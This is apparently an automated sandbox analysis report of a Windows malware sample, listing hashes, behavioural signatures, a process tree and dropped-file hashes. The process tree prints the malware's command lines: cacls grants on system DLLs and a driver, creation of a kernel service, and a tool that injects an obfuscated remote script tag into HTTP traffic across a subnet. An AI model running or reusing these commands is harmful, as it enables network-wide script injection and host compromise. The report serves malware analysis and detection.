Analysis
-
max time kernel
91s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
19-09-2022 15:42
Static task
static1
Behavioral task
behavioral1
Sample
817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe
Resource
win10v2004-20220901-en
General
-
Target
817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe
-
Size
180KB
-
MD5
4aff01ea7c1d02b1875305bc9c9def02
-
SHA1
37290aa6679dd108b5b2ff0b65d2d3dccabc3c4d
-
SHA256
817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1
-
SHA512
7266d51a29a5feb87163faee23ca88ba95f3c7028740ac2ce80e59d23a5dc6302c5793005d7dba25a61a459a1bd4031836b7ceb96cd11b35fcf3db43f4ad381f
-
SSDEEP
3072:vKpbbD+2uubU75qMs4s9k3PRl3RpM6Aa2A+9tUf9z5GmO+JTt93+FX6QB/6ForPh:vK9bjvbY5qj4s9oHhIA+Luz5Gmp3+FXr
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\drivers\npf.sys 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe -
Executes dropped EXE 2 IoCs
pid Process 3480 360trar.exe 3712 360trar.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe -
Loads dropped DLL 12 IoCs
pid Process 3480 360trar.exe 3480 360trar.exe 3480 360trar.exe 3480 360trar.exe 3480 360trar.exe 3480 360trar.exe 3712 360trar.exe 3712 360trar.exe 3712 360trar.exe 3712 360trar.exe 3712 360trar.exe 3712 360trar.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe File created C:\Windows\SysWOW64\wpcap.dll 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe File created C:\Windows\SysWOW64\npptools.dll 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe File created C:\Windows\SysWOW64\360trar.exe 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe File created C:\Windows\SysWOW64\WanPacket.dll 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4428 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe -
Suspicious behavior: LoadsDriver 10 IoCs
pid Process 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2064 wrote to memory of 1952 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 83 PID 2064 wrote to memory of 1952 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 83 PID 2064 wrote to memory of 1952 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 83 PID 1952 wrote to memory of 3652 1952 cmd.exe 85 PID 1952 wrote to memory of 3652 1952 cmd.exe 85 PID 1952 wrote to memory of 3652 1952 cmd.exe 85 PID 2064 wrote to memory of 3572 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 87 PID 2064 wrote to memory of 3572 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 87 PID 2064 wrote to memory of 3572 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 87 PID 3572 wrote to memory of 236 3572 cmd.exe 90 PID 3572 wrote to memory of 236 3572 cmd.exe 90 PID 3572 wrote to memory of 236 3572 cmd.exe 90 PID 2064 wrote to memory of 4372 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 92 PID 2064 wrote to memory of 4372 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 92 PID 2064 wrote to memory of 4372 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 92 PID 4372 wrote to memory of 4388 4372 cmd.exe 94 PID 4372 wrote to memory of 4388 4372 cmd.exe 94 PID 4372 wrote to memory of 4388 4372 cmd.exe 94 PID 2064 wrote to memory of 4712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 95 PID 2064 wrote to memory of 4712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 95 PID 2064 wrote to memory of 4712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 95 PID 4712 wrote to memory of 1512 4712 cmd.exe 97 PID 4712 wrote to memory of 1512 4712 cmd.exe 97 PID 4712 wrote to memory of 1512 4712 cmd.exe 97 PID 2064 wrote to memory of 4364 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 98 PID 2064 wrote to memory of 4364 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 98 PID 2064 wrote to memory of 4364 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 98 PID 4364 wrote to memory of 1412 4364 cmd.exe 100 PID 4364 wrote to memory of 1412 4364 cmd.exe 100 PID 4364 wrote to memory of 1412 4364 cmd.exe 100 PID 2064 wrote to memory of 4428 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 103 PID 2064 wrote to memory of 4428 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 103 PID 2064 wrote to memory of 4428 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 103 PID 2064 wrote to memory of 3480 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 113 PID 2064 wrote to memory of 3480 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 113 PID 2064 wrote to memory of 3480 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 113 PID 2064 wrote to memory of 3712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 118 PID 2064 wrote to memory of 3712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 118 PID 2064 wrote to memory of 3712 2064 817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe"C:\Users\Admin\AppData\Local\Temp\817e6824d0717485d6d13bdbee00bfa8ba60bedc33d2183bc57dcbf66ad1b2a1.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\WanPacket.dll /e /p everyone:f2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WanPacket.dll /e /p everyone:f3⤵PID:3652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\Packet.dll /e /p everyone:f2⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Packet.dll /e /p everyone:f3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\wpcap.dll /e /p everyone:f2⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wpcap.dll /e /p everyone:f3⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\npptools.dll /e /p everyone:f2⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\npptools.dll /e /p everyone:f3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cacls %systemroot%\system32\drivers\npf.sys /e /p everyone:f2⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\npf.sys /e /p everyone:f3⤵PID:1412
-
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand2⤵
- Launches sc.exe
PID:4428
-
-
C:\Windows\SysWOW64\360trar.exe"C:\Windows\system32\360trar.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://i%338.x%6Frg.%70l/a.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3480
-
-
C:\Windows\SysWOW64\360trar.exe"C:\Windows\system32\360trar.exe" -idx 1 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=javascript src=http://i%338.x%6Frg.%70l/a.js></script>"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3712
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD5ca42539e85a7f9bb372da8124f7a3254
SHA194ada2eaf210d3669b9d6873a5463eda6207a12a
SHA2561a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f
SHA5124e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017
-
Filesize
13KB
MD5ca42539e85a7f9bb372da8124f7a3254
SHA194ada2eaf210d3669b9d6873a5463eda6207a12a
SHA2561a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f
SHA5124e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017
-
Filesize
13KB
MD5ca42539e85a7f9bb372da8124f7a3254
SHA194ada2eaf210d3669b9d6873a5463eda6207a12a
SHA2561a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f
SHA5124e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017
-
Filesize
48KB
MD538e7f4e56118d91df929dba40035c017
SHA1a6fe6350e19622fd60561547a6a6882bdc52bfb7
SHA256281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361
SHA512c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
66KB
MD5fdd104a9fd3427a1df37041fa947a041
SHA1cca1881a3c02033008f78cc39b712b637c7f3e13
SHA256384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a
SHA5129dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7
-
Filesize
41KB
MD5b15e0180c43d8b5219196d76878cc2dd
SHA133e676b37a3380de32c10ba5bc9170997445d314
SHA256a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab
SHA51247e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09
-
Filesize
48KB
MD538e7f4e56118d91df929dba40035c017
SHA1a6fe6350e19622fd60561547a6a6882bdc52bfb7
SHA256281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361
SHA512c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4
-
Filesize
48KB
MD538e7f4e56118d91df929dba40035c017
SHA1a6fe6350e19622fd60561547a6a6882bdc52bfb7
SHA256281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361
SHA512c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4
-
Filesize
86KB
MD59062aeea8cbfc4f0780bbbefad7cebcb
SHA1c4ad39ec51ad0e84fe58f62931d13cddfde3189e
SHA256b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c
SHA51260957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6
-
Filesize
234KB
MD5ce842d25e5b7e6ff21a86cad9195fbe8
SHA1d762270be089a89266b012351b52c595e260b59b
SHA2567e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3
SHA51284c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6